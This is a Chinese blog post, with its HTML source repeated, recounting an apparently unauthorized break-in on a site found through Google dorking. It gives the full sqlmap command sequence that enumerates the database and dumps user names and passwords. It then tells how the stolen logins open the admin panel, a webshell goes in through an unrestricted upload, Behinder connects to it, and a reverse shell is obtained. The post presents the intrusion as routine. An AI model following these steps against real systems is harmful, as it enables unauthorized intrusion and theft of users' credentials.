对某站一次简单的sql注入及getshell

博主： yuaneuro
发布时间：2021 年 03 月 30 日
1147 次浏览
暂无评论
1490字数
分类：网络安全

前言

最近在使用Google Hack搜索网站时偶然发现一个存在sql注入的网站，经过进一步的渗透和挖掘发现后台地址及账号密码，并最终获取shell

找到目标站点：

通过简单的加单引号判断有报错

所以直接丢到sqlmap里跑一下

果不其然存在sql注入漏洞
sqlmap

接下来就是常规操作

获取数据库名：
python sqlmap.py -u http://xxx.com/index.php?id=23 --dbs
查询数据库用户角色：
python sqlmap.py -u http://xxx.com/index.php?id=23 --roles

可惜了权限很低
爆表
python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx --tables
爆字段
python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx -T xx_users --columns
爆数据
python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx -T xx_users -C username,password --dump

获得所有用户名和密码

寻找后台及getshell

刚开始用dirsearch跑了一下后台没结果，后来查看了一下robots.txt，发现了后台目录，

使用刚刚获取到的账号密码成功登录后台

后台有个地方可以直接上传文件，没有限制，直接上传马子能成功

用冰蝎连接

连接成功
权限很低，而且没有安装gcc无法编译exp提权。
反弹shell成功：

最后修改：2021 年 03 月 30 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复

对某站一次简单的sql注入及getshell

yuaneuro • 2021 年 03 月 30 日

<h1>前言</h1>
<p>最近在使用Google Hack搜索网站时偶然发现一个存在sql注入的网站，经过进一步的渗透和挖掘发现后台地址及账号密码，并最终获取shell</p>
<h2>找到目标站点：</h2>
<p><img src="https://img-blog.csdnimg.cn/20210329233334338.png" alt="" style=""><br />
通过简单的加单引号判断有报错<br />
<img src="https://img-blog.csdnimg.cn/20210329233553736.png" alt="" style=""><br />
所以直接丢到sqlmap里跑一下</p>
<p>果不其然存在sql注入漏洞<br />
<img src="https://img-blog.csdnimg.cn/20210329233940155.png" alt="sqlmap" style=""></p>
<h2>接下来就是常规操作</h2>
<ul>
<li>获取数据库名：<br />
<code>python sqlmap.py -u http://xxx.com/index.php?id=23 --dbs</code><br />
<img src="https://img-blog.csdnimg.cn/20210329234118639.png" alt="" style=""></li>
<li>查询数据库用户角色：<br />
<code>python sqlmap.py -u http://xxx.com/index.php?id=23 --roles</code><br />
<img src="https://img-blog.csdnimg.cn/20210329234330264.png" alt="" style=""><br />
可惜了权限很低</li>
<li>爆表<br />
<code>python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx --tables</code><br />
<img src="https://img-blog.csdnimg.cn/20210329234531454.png" alt="" style=""></li>
<li>爆字段<br />
<code>python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx -T xx_users --columns</code></li>
<li>爆数据<br />
<code>python sqlmap.py -u http://xxx.com/index.php?id=23 -D xx -T xx_users -C username,password --dump</code><br />
<img src="https://img-blog.csdnimg.cn/20210329234903222.png" alt="" style=""><br />
获得所有用户名和密码</li>
</ul>
<h1>寻找后台及getshell</h1>
<p>刚开始用dirsearch跑了一下后台没结果，后来查看了一下robots.txt，发现了后台目录，</p>
<p><img src="https://img-blog.csdnimg.cn/20210329235130325.png" alt="" style=""><br />
使用刚刚获取到的账号密码成功登录后台<br />
<img src="https://img-blog.csdnimg.cn/20210329235406179.png" alt="" style=""><br />
后台有个地方可以直接上传文件，没有限制，直接上传马子能成功</p>
<ul>
<li>用冰蝎连接<br />
<img src="https://img-blog.csdnimg.cn/2021032923570618.png" alt="" style=""><br />
连接成功</li>
<li>权限很低，而且没有安装gcc无法编译exp提权。<img src="https://img-blog.csdnimg.cn/20210329235903611.png" alt="" style=""></li>
<li>反弹shell成功：<br />
<img src="https://img-blog.csdnimg.cn/20210330000225351.png" alt="" style=""></li>
</ul>